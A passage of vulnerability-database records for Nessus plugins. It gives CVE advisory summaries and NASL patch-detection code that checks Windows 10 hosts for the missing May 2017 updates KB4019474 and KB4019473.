vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. 
(CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019474/windows-10-update-kb4019474\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01ec841b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019474.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019474' # 10 1507\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:29", "description": "The remote Windows 10 version 1511 host is missing security update KB4019473. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. 
(CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. 
An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019473: Windows 10 Version 1511 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019473.NASL", "href": "https://www.tenable.com/plugins/nessus/100060", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100060);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n 
\"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019473\");\n script_xref(name:\"MSFT\", value:\"MS17-4019473\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019473: Windows 10 Version 1511 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1511 host is missing security update\nKB4019473. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. 
An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. 
(CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. 
An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. 
An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. 
(CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019473/windows-10-update-kb4019473\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4763dd01\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019473.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", 
